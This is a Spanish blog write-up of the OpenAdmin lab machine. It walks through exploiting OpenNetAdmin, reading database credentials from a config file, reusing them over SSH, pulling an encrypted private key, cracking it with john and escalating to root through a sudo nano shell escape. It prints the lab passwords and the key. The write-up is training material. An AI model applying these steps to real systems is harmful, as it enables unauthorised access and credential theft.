May 02 2020
0

Resumen:

Explotando una vulnerabilidad de OpenNetAdmin se pudo obtener ejecución de comando en la máquina. Con este acceso se obtuvo credenciales de la base de datos, y por re uso de credenciales se pudo acceder al equipo por ssh, con este acceso se pudo ver una llave privada y acceder con un segundo usuario. Para terminar con el uso de gtfobins se escala privilegios.

Punto de apoyo inicial

Enumeramos de manera habitual, y se encuentra la aplicación OpenNetAdmin 18.1.1:

http://openadmin.htb/ona/

Una vulnerabilidad en este software es explotable:

https://www.exploit-db.com/exploits/47691

Obteniendo el usuario (1/2)

Con el acceso que se obtuvo explotando la vulnerabilidad en OpenNetAdmin, se pudo identificar el archivo de configuración de la base de datos, este contiene credenciales.

$ cat local/config/database_settings.inc.php  
<?php

$ona_contexts=array (
 'DEFAULT' =>  
 array (
   'databases' =>  
   array (
     0 =>  
     array (
       'db_type' => 'mysqli',
       'db_host' => 'localhost',
       'db_login' => 'ona_sys',
       'db_passwd' => 'n1nj4W4rri0R!',
       'db_database' => 'ona_default',
       'db_debug' => false,
     ),
   ),
   'description' => 'Default data context',
   'context_color' => '#D3DBFF',
 ),
);

$ ls /home
jimmy
joanna
$

Con el password de la base de datos se puede iniciar sesión con el usuario jimmy por ssh.

Enumerando la máquina con la credencial de jimmy, se puede identificar que existe un Virtual Host de apache publicado en el puerto 52846 y solo se puede ver de modo local.

jimmy@openadmin:/var/www/internal$ cat /etc/apache2/sites-enabled/internal.conf  
Listen 127.0.0.1:52846

<VirtualHost 127.0.0.1:52846>
   ServerName internal.openadmin.htb
   DocumentRoot /var/www/internal

<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>

   ErrorLog ${APACHE_LOG_DIR}/error.log
   CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>

Obteniendo el usuario (2/2)

Con el comando curl, haciendo una petición a localhost por el puerto 52846 se puede obtener una llave privada para ssh.

jimmy@openadmin:/var/www/internal$ curl http://localhost:52846/main.php
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D

kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8
ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO
ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE
6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ
ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du
y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI
9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4
piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/
/U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH
40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ
fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb
9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80
X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg
S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F
FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh
Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa
RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z
uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr
1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2
XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79
yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM
+4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt
qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt
z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe
K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN
-----END RSA PRIVATE KEY-----
</pre><html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
jimmy@openadmin:/var/www/internal$

Con el uso de ssh2john se obtiene el hash para luego con john y roxkyou poder crackear el password.

/opt/john-1.9.0-jumbo-1/run/john --wordlist=../../wordlist/rockyou.txt id_rsa.encrypted   
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas      (id_rsa)
Warning: Only 1 candidate left, minimum 8 needed for performance.
1g 0:00:00:05 DONE (2020-01-06 18:59) 0.1712g/s 2455Kp/s 2455Kc/s 2455KC/s *7¡Vamos!
Session completed

Con el password de la llave privada y la llave privada, se pudo acceder con el usuario joanna.

Obteniendo el Root

Con LinEnum.sh ejecutado como joanna se pudo ver:

User joanna may run the following commands on openadmin:
   (ALL) NOPASSWD: /bin/nano /opt/priv

Con el uso de https://gtfobins.github.io/gtfobins/nano/ se puede elevar privilegios de manera simple siguiendo las instrucciones detalladas en este sitio. 

sudo nano
^R^X
reset; sh 1>&0 2>&0

ROOT





Publicado enBlog

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *